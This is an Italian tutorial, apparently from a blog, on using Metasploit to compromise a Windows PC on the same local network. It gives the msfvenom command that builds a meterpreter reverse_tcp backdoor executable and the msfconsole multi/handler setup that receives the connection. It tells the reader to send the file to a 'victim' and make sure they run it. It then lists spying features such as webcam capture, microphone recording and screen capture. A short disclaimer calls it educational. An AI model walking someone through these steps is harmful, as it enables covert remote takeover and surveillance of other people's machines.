Metasploit: Come hackerare windows

Quanto scritto funziona solo in rete locale, ergo: Potrete attaccare un pc connesso alla vostra stessa rete.

prepariamoci

Abbiamo già parlato di Metasploit e abbiamo visto come configurarlo al primo avvio, se te lo sei perso clicca qui.

Quello che andremo a creare è un BackDoor ossia un software capace di farci prendere il pieno controllo della macchina attaccata, in questo caso, faremo un attacco ad un sistema Windows.

Apriamo il terminale e siate certi di utilizzarlo come utente root dunque digitiamo:

su

Inseriamo la nostra password o di default toor

Adesso ci servono alcune informazioni per poter creare il nostro payload

  • Il nostro ip interno alla rete locale [LHOST]

Per conoscere il nostro ip basta digitare in terminale il seguente comando:

ifconfig

Riceveremo in output le schede Ethernet (eth0) e Wireless (wlan0).

Prendiamo nota dell’ip sotto la voce inet (192.xxx.xxx.xxx) della scheda che stiamo utilizzando.

Nel mio caso sto utilizzando la scheda wlan0 e l’ip interno alla rete locale è 192.168.1.2

Adesso passiamo ai fatti.

Spostiamoci nella directory in cui vogliamo salvare il file generato, nel mio caso lo voglio in scrivania (desktop):

cd /home/manu/Scrivania
Creiamo il virus

Digitiamo il comando:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=[il tuo ip] LPORT=[una porta a piacere] -f exe > [un nome a piacere].exe

Abbiamo -p (payload) nel nostro caso meterpreter consente di iniettare DLL nella macchina della vittima e lavora solo su RAM senza lasciare file sul disco, -f (formato del file che vogliamo generare).

Non abbiamo incluso nel comando l’architettura del sistema (-a), verrà generato automaticamente con l’architettura a 32 bit = x86, e la piattaforma (–platform) nel caso abbiate una preferenza specifica basta inserire prima di LHOST il comando:

...reverse_tcp -a x64 --platform windows LHOST=...

 Comparirà sulla nostra Scrivania il file appena creato.

Ora basta solo inviarlo alla vittima e assicurarci che lo esegua!

Nel frattempo avviamo la nostra console per metterci in ascolto con il nostro payload avviando l’exploit!

Dunque digitiamo in terminale:

systemctl start postgresql

msfconsole

db_status
security override

Digitiamo:

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost [IP utilizzato nella creazione del payload]

set lport [Porta utilizzata nella creazione del payload]

run

A questo punto dobbiamo solo aspettare che la nostra vittima esegua il file inviato ed è fatta!

Partito meterpreter possiamo digitare help per avere la lista di tutti i comandi da eseguire, ad esempio scattare foto dalla webcam o avviare la registrazione del microfono, catturare il desktop, avviare la navigazione delle directory e molto altro!

Manca una cosa però, se l’utente riavvia il pc dovremmo aspettare che nuovamente avvii il nostro virus.

Come difenderti da cose simili?? LEGGI QUI

Attenzione: Questa guida è stata scritta solo a scopo didattico non mi assumo nessuna responsabilità per le vostre azioni illegali o danni causati. ricordo che la violazione della privacy e danni causati tramite mezzi informatici, sono puniti penalmente!